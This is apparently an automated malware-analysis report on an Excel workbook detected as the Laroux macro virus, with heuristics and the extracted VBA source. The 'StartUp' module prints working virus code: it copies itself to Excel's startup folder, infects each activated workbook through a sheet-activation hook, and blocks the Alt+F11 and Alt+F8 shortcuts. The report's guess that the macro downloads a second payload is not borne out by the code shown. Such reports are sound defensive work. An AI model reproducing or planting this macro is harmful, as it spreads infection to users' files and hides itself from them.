MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Office document containing a large VBA macro, flagged by ClamAV as Doc.Macro.Laroux-5893719-0. The presence of an Auto_Open macro suggests an attempt to automatically execute malicious code upon opening the document. The macro's likely purpose is to download and execute a secondary payload, a common technique for malware distribution.
Heuristics 3
-
ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13004 bytes |
SHA-256: 2c52b275a4db1dff160bd93d7fcdfff81f2d902ec6481e8d7c89da6b4dfb9183 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox55, 144, 23, MSForms, CheckBox"
Attribute VB_Control = "CheckBox9, 143, 24, MSForms, CheckBox"
Attribute VB_Control = "CheckBox17, 142, 25, MSForms, CheckBox"
Attribute VB_Control = "CheckBox16, 141, 26, MSForms, CheckBox"
Attribute VB_Control = "CheckBox21, 140, 27, MSForms, CheckBox"
Attribute VB_Control = "CheckBox20, 139, 28, MSForms, CheckBox"
Attribute VB_Control = "CheckBox19, 138, 29, MSForms, CheckBox"
Attribute VB_Control = "CheckBox29, 137, 30, MSForms, CheckBox"
Attribute VB_Control = "CheckBox26, 136, 31, MSForms, CheckBox"
Attribute VB_Control = "CheckBox25, 135, 32, MSForms, CheckBox"
Attribute VB_Control = "CheckBox23, 134, 33, MSForms, CheckBox"
Attribute VB_Control = "CheckBox38, 133, 34, MSForms, CheckBox"
Attribute VB_Control = "CheckBox35, 132, 35, MSForms, CheckBox"
Attribute VB_Control = "CheckBox39, 131, 36, MSForms, CheckBox"
Attribute VB_Control = "CheckBox15, 39, 37, MSForms, CheckBox"
Attribute VB_Control = "CheckBox6, 41, 39, MSForms, CheckBox"
Attribute VB_Control = "CheckBox7, 42, 40, MSForms, CheckBox"
Attribute VB_Control = "CheckBox8, 43, 41, MSForms, CheckBox"
Attribute VB_Control = "CheckBox10, 45, 43, MSForms, CheckBox"
Attribute VB_Control = "CheckBox11, 46, 44, MSForms, CheckBox"
Attribute VB_Control = "CheckBox56, 130, 45, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 50, 48, MSForms, CheckBox"
Attribute VB_Control = "CheckBox5, 51, 49, MSForms, CheckBox"
Attribute VB_Control = "CheckBox12, 52, 50, MSForms, CheckBox"
Attribute VB_Control = "CheckBox14, 53, 51, MSForms, CheckBox"
Attribute VB_Control = "CheckBox18, 56, 54, MSForms, CheckBox"
Attribute VB_Control = "CheckBox22, 60, 58, MSForms, CheckBox"
Attribute VB_Control = "CheckBox24, 63, 61, MSForms, CheckBox"
Attribute VB_Control = "CheckBox27, 66, 64, MSForms, CheckBox"
Attribute VB_Control = "CheckBox28, 67, 65, MSForms, CheckBox"
Attribute VB_Control = "CheckBox34, 126, 66, MSForms, CheckBox"
Attribute VB_Control = "CheckBox30, 70, 68, MSForms, CheckBox"
Attribute VB_Control = "CheckBox31, 71, 69, MSForms, CheckBox"
Attribute VB_Control = "CheckBox32, 72, 70, MSForms, CheckBox"
Attribute VB_Control = "CheckBox36, 76, 74, MSForms, CheckBox"
Attribute VB_Control = "CheckBox37, 77, 75, MSForms, CheckBox"
Attribute VB_Control = "CheckBox1, 125, 76, MSForms, CheckBox"
Attribute VB_Control = "CheckBox33, 124, 77, MSForms, CheckBox"
Attribute VB_Control = "CheckBox3, 123, 78, MSForms, CheckBox"
Attribute VB_Control = "CheckBox2, 122, 81, MSForms, CheckBox"
Attribute VB_Control = "CheckBox42, 85, 83, MSForms, CheckBox"
Attribute VB_Control = "CheckBox43, 86, 84, MSForms, CheckBox"
Attribute VB_Control = "CheckBox44, 87, 85, MSForms, CheckBox"
Attribute VB_Control = "CheckBox45, 88, 86, MSForms, CheckBox"
Attribute VB_Control = "CheckBox46, 89, 87, MSForms, CheckBox"
Attribute VB_Control = "CheckBox47, 90, 88, MSForms, CheckBox"
Attribute VB_Control = "CheckBox48, 91, 89, MSForms, CheckBox"
Attribute VB_Control = "CheckBox49, 92, 90, MSForms, CheckBox"
Attribute VB_Control = "CheckBox50, 93, 91, MSForms, CheckBox"
Attribute VB_Control = "CheckBox51, 94, 92, MSForms, CheckBox"
Attribute VB_Control = "CheckBox52, 95, 93, MSForms, CheckBox"
Attribute VB_Control = "CheckBox53, 96, 94, MSForms, CheckBox"
Attribute VB_Control = "CheckBox54, 97, 95, MSForms, CheckBox"
Attribute VB_Control = "CheckBox41, 112, 96, MSForms, CheckBox"
Attribute VB_Control = "CheckBox59, 103, 101, MSForms, CheckBox"
Attribute VB_Control = "CheckBox60, 104, 102, MSForms, CheckBox"
Attribute VB_Control = "CheckBox61, 105, 103, MSForms, CheckBox"
Attribute VB_Control = "CheckBox62, 106, 104, MSForms, CheckBox"
Attribute VB_Control = "CheckBox63, 107, 105, MSForms, CheckBox"
Attribute VB_Control = "CheckBox64, 108, 106, MSForms, CheckBox"
Attribute VB_Control = "CheckBox40, 111, 107, MSForms, CheckBox"
Private Sub TextBox1_Change()
End Sub
Private Sub CheckBox1_Click()
End Sub
Private Sub CheckBox25_Click()
End Sub
Private Sub CheckBox3_Click()
End Sub
Private Sub CheckBox56_Click()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox3, 58, 16, MSForms, CheckBox"
Attribute VB_Control = "CheckBox2, 57, 17, MSForms, CheckBox"
Attribute VB_Control = "CheckBox1, 56, 18, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 54, 20, MSForms, CheckBox"
Attribute VB_Control = "CheckBox39, 67, 52, MSForms, CheckBox"
Attribute VB_Control = "CheckBox38, 68, 53, MSForms, CheckBox"
Attribute VB_Control = "CheckBox9, 69, 54, MSForms, CheckBox"
Attribute VB_Control = "CheckBox8, 70, 55, MSForms, CheckBox"
Attribute VB_Control = "CheckBox7, 71, 56, MSForms, CheckBox"
Attribute VB_Control = "CheckBox6, 72, 57, MSForms, CheckBox"
Attribute VB_Control = "CheckBox5, 73, 58, MSForms, CheckBox"
Attribute VB_Control = "CheckBox10, 75, 60, MSForms, CheckBox"
Attribute VB_Control = "CheckBox12, 76, 61, MSForms, CheckBox"
Attribute VB_Control = "CheckBox32, 77, 62, MSForms, CheckBox"
Attribute VB_Control = "CheckBox31, 78, 63, MSForms, CheckBox"
Attribute VB_Control = "CheckBox30, 79, 64, MSForms, CheckBox"
Attribute VB_Control = "CheckBox29, 80, 65, MSForms, CheckBox"
Attribute VB_Control = "CheckBox28, 81, 66, MSForms, CheckBox"
Attribute VB_Control = "CheckBox40, 82, 67, MSForms, CheckBox"
Attribute VB_Control = "CheckBox27, 83, 68, MSForms, CheckBox"
Attribute VB_Control = "CheckBox36, 84, 69, MSForms, CheckBox"
Attribute VB_Control = "CheckBox35, 85, 70, MSForms, CheckBox"
Attribute VB_Control = "CheckBox34, 86, 71, MSForms, CheckBox"
Attribute VB_Control = "CheckBox33, 87, 72, MSForms, CheckBox"
Attribute VB_Control = "CheckBox11, 88, 73, MSForms, CheckBox"
Attribute VB_Control = "CheckBox13, 89, 74, MSForms, CheckBox"
Attribute VB_Control = "CheckBox14, 90, 75, MSForms, CheckBox"
Attribute VB_Control = "CheckBox15, 91, 76, MSForms, CheckBox"
Attribute VB_Control = "CheckBox16, 92, 77, MSForms, CheckBox"
Attribute VB_Control = "CheckBox17, 93, 78, MSForms, CheckBox"
Attribute VB_Control = "CheckBox18, 94, 79, MSForms, CheckBox"
Attribute VB_Control = "CheckBox19, 95, 80, MSForms, CheckBox"
Attribute VB_Control = "CheckBox20, 96, 81, MSForms, CheckBox"
Attribute VB_Control = "CheckBox21, 97, 82, MSForms, CheckBox"
Attribute VB_Control = "CheckBox22, 98, 83, MSForms, CheckBox"
Attribute VB_Control = "CheckBox23, 99, 84, MSForms, CheckBox"
Attribute VB_Control = "CheckBox24, 100, 85, MSForms, CheckBox"
Attribute VB_Control = "CheckBox25, 101, 86, MSForms, CheckBox"
Attribute VB_Control = "CheckBox26, 102, 87, MSForms, CheckBox"
Private Sub CheckBox12_Click()
End Sub
Private Sub CheckBox26_Click()
End Sub
Private Sub CheckBox33_Click()
End Sub
Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox15, 2, 0, MSForms, CheckBox"
Attribute VB_Control = "CheckBox6, 3, 1, MSForms, CheckBox"
Attribute VB_Control = "CheckBox7, 4, 2, MSForms, CheckBox"
Attribute VB_Control = "CheckBox8, 5, 3, MSForms, CheckBox"
Attribute VB_Control = "CheckBox10, 6, 4, MSForms, CheckBox"
Attribute VB_Control = "CheckBox11, 7, 5, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 8, 6, MSForms, CheckBox"
Attribute VB_Control = "CheckBox5, 9, 7, MSForms, CheckBox"
Attribute VB_Control = "CheckBox12, 10, 8, MSForms, CheckBox"
Attribute VB_Control = "CheckBox14, 11, 9, MSForms, CheckBox"
Attribute VB_Control = "CheckBox18, 12, 10, MSForms, CheckBox"
Attribute VB_Control = "CheckBox22, 13, 11, MSForms, CheckBox"
Attribute VB_Control = "CheckBox24, 14, 12, MSForms, CheckBox"
Attribute VB_Control = "CheckBox27, 15, 13, MSForms, CheckBox"
Attribute VB_Control = "CheckBox28, 16, 14, MSForms, CheckBox"
Attribute VB_Control = "CheckBox30, 17, 15, MSForms, CheckBox"
Attribute VB_Control = "CheckBox31, 18, 16, MSForms, CheckBox"
Attribute VB_Control = "CheckBox32, 19, 17, MSForms, CheckBox"
Attribute VB_Control = "CheckBox36, 20, 18, MSForms, CheckBox"
Attribute VB_Control = "CheckBox37, 21, 19, MSForms, CheckBox"
Attribute VB_Control = "CheckBox42, 22, 20, MSForms, CheckBox"
Attribute VB_Control = "CheckBox43, 23, 21, MSForms, CheckBox"
Attribute VB_Control = "CheckBox44, 24, 22, MSForms, CheckBox"
Attribute VB_Control = "CheckBox45, 25, 23, MSForms, CheckBox"
Attribute VB_Control = "CheckBox46, 26, 24, MSForms, CheckBox"
Attribute VB_Control = "CheckBox47, 27, 25, MSForms, CheckBox"
Attribute VB_Control = "CheckBox48, 28, 26, MSForms, CheckBox"
Attribute VB_Control = "CheckBox49, 29, 27, MSForms, CheckBox"
Attribute VB_Control = "CheckBox50, 30, 28, MSForms, CheckBox"
Attribute VB_Control = "CheckBox51, 31, 29, MSForms, CheckBox"
Attribute VB_Control = "CheckBox52, 32, 30, MSForms, CheckBox"
Attribute VB_Control = "CheckBox53, 33, 31, MSForms, CheckBox"
Attribute VB_Control = "CheckBox54, 34, 32, MSForms, CheckBox"
Attribute VB_Control = "CheckBox59, 35, 33, MSForms, CheckBox"
Attribute VB_Control = "CheckBox60, 36, 34, MSForms, CheckBox"
Attribute VB_Control = "CheckBox61, 37, 35, MSForms, CheckBox"
Attribute VB_Control = "CheckBox62, 38, 36, MSForms, CheckBox"
Attribute VB_Control = "CheckBox63, 39, 37, MSForms, CheckBox"
Attribute VB_Control = "CheckBox64, 40, 38, MSForms, CheckBox"
Attribute VB_Control = "CheckBox40, 41, 39, MSForms, CheckBox"
Attribute VB_Control = "CheckBox41, 42, 40, MSForms, CheckBox"
Attribute VB_Control = "CheckBox2, 43, 41, MSForms, CheckBox"
Attribute VB_Control = "CheckBox3, 44, 42, MSForms, CheckBox"
Attribute VB_Control = "CheckBox33, 45, 43, MSForms, CheckBox"
Attribute VB_Control = "CheckBox1, 46, 44, MSForms, CheckBox"
Attribute VB_Control = "CheckBox34, 47, 45, MSForms, CheckBox"
Attribute VB_Control = "CheckBox56, 48, 46, MSForms, CheckBox"
Attribute VB_Control = "CheckBox39, 49, 47, MSForms, CheckBox"
Attribute VB_Control = "CheckBox35, 50, 48, MSForms, CheckBox"
Attribute VB_Control = "CheckBox38, 51, 49, MSForms, CheckBox"
Attribute VB_Control = "CheckBox23, 52, 50, MSForms, CheckBox"
Attribute VB_Control = "CheckBox25, 53, 51, MSForms, CheckBox"
Attribute VB_Control = "CheckBox26, 54, 52, MSForms, CheckBox"
Attribute VB_Control = "CheckBox29, 55, 53, MSForms, CheckBox"
Attribute VB_Control = "CheckBox19, 56, 54, MSForms, CheckBox"
Attribute VB_Control = "CheckBox20, 57, 55, MSForms, CheckBox"
Attribute VB_Control = "CheckBox21, 58, 56, MSForms, CheckBox"
Attribute VB_Control = "CheckBox16, 59, 57, MSForms, CheckBox"
Attribute VB_Control = "CheckBox17, 60, 58, MSForms, CheckBox"
Attribute VB_Control = "CheckBox9, 61, 59, MSForms, CheckBox"
Attribute VB_Control = "CheckBox55, 62, 60, MSForms, CheckBox"
Private Sub TextBox1_Change()
End Sub
Private Sub CheckBox1_Click()
End Sub
Private Sub CheckBox25_Click()
End Sub
Private Sub CheckBox3_Click()
End Sub
Private Sub CheckBox56_Click()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.